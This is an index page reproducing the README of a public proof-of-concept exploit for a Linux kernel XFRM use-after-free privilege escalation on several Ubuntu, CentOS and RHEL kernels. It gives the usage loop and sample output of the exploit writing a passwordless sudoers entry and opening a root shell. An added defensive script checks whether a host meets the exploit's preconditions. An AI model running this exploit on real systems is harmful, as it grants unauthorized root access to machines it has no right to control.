Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/duasynt/xfrm_poc
Linux kernel XFRM UAF poc (3.x - 5.x kernels)
Last synced: 1 day ago
- Host: GitHub
- URL: https://github.com/duasynt/xfrm_poc
- Owner: duasynt
- Created: 2020-02-27T23:36:55.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2020-02-28T18:06:37.000Z (over 4 years ago)
- Last Synced: 2024-08-02T05:08:40.353Z (3 months ago)
- Size: 169 KB
- Stars: 132
- Watchers: 11
- Forks: 37
- Open Issues: 3
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## Linux kernel 3.x - 5.x XFRM UAF PoC
This is a PoC for the [kernel vulnerability](https://duasynt.com/blog/ubuntu-centos-redhat-privesc) that was reported last year. CentOS was the last distribution to patch the bug, in January 2020. The technical report is here: https://duasynt.com/pub/vnik/01-0311-2018.pdf
Should work on all kernels with a build date before July - November 2019 on the following distributions:

- Ubuntu 14.04 / 16.04 Server 4.4 LTS kernels
- CentOS 8 4.18 kernels
- Red Hat Enterprise Linux 8 4.18 kernels
- Ubuntu 18.04 Server LTS 4.15 kernels

Other distributions might be affected if:

- unprivileged user namespaces are allowed
- xfrm support is compiled in or can be autoloaded
- the patch was not backported

It will probably take several tries to win the race (sometimes over 10 attempts), so run it in a loop just like it says:

```
$ while :; do ./lucky0 -q && break; done
```

On success, the current user is added to /etc/sudoers without a password.
```
[vnik@localhost ~]$ cat /etc/redhat-release
CentOS Linux release 8.1.1911 (Core)
[vnik@localhost ~]$ uname -a
Linux localhost.localdomain 4.18.0-80.11.2.el8_0.x86_64 #1 SMP Tue Sep 24 11:32:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
[vnik@localhost ~]$ while :; do ./lucky0 -q && break; done
[-] failed to win the race
[-] failed to win the race
[-] failed to win the race
[-] failed to win the race
[+] current user vnik was added to /etc/sudoers w/o a password. 'sudo -s' to get a shell
[vnik@localhost ~]$ sudo -s
[root@localhost vnik]#
```

**On 4.4.x kernels it may trigger a null oops but it's fully recoverable.**
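The two host-side preconditions the README lists (unprivileged user namespaces allowed, xfrm netlink support built in or autoloadable) can be audited with a short script. The one below is an added example and is not part of the xfrm_poc repository; it assumes the Ubuntu/Debian `kernel.unprivileged_userns_clone` switch, the upstream `user.max_user_namespaces` limit, and a `/boot/config-<release>` kernel config as the places to look, and takes those paths as parameters so the checks can be run against a copied tree.

```shell
#!/bin/sh
# Added example (not part of the xfrm_poc repository): audits the two
# host-side preconditions named in the README. The sysctl paths and the
# config-file location are assumptions about Ubuntu/Debian and RHEL kernels.

# Returns 0 when unprivileged user namespaces appear to be allowed.
# $1 = sysctl tree root (defaults to /proc/sys) so a copied tree can be tested.
userns_allowed() {
    root="${1:-/proc/sys}"
    # Ubuntu/Debian kernels carry an out-of-tree on/off switch (assumption)
    if [ -r "$root/kernel/unprivileged_userns_clone" ]; then
        [ "$(cat "$root/kernel/unprivileged_userns_clone")" != "0" ]
        return $?
    fi
    # upstream 4.9+ and RHEL 8: a limit of 0 disables user namespaces entirely
    if [ -r "$root/user/max_user_namespaces" ]; then
        [ "$(cat "$root/user/max_user_namespaces")" != "0" ]
        return $?
    fi
    return 0   # no knob present: nothing blocks clone(CLONE_NEWUSER)
}

# Returns 0 when the xfrm netlink interface is built in (=y) or a loadable
# module (=m), i.e. "xfrm support is compiled in or can be autoloaded".
# $1 = kernel config file
xfrm_user_available() {
    grep -q '^CONFIG_XFRM_USER=[ym]' "$1" 2>/dev/null
}

# Prints one line per precondition for the running host.
# $1 = kernel config file (defaults to /boot/config-<running release>)
report() {
    cfg="${1:-/boot/config-$(uname -r)}"
    if userns_allowed; then
        echo "[!] unprivileged user namespaces: allowed (disable or limit if unused)"
    else
        echo "[ok] unprivileged user namespaces: blocked"
    fi
    if xfrm_user_available "$cfg"; then
        echo "[!] CONFIG_XFRM_USER enabled in $cfg (xfrm_user can be autoloaded)"
    else
        echo "[ok] CONFIG_XFRM_USER not enabled in $cfg"
    fi
}

report "$@"
```

Both flags reported as `[!]` only mean the README's preconditions hold; the actual fix is the backported kernel patch, and blocking unprivileged user namespaces or blacklisting `xfrm_user` where IPsec is not needed removes the two preconditions on hosts that cannot be patched yet.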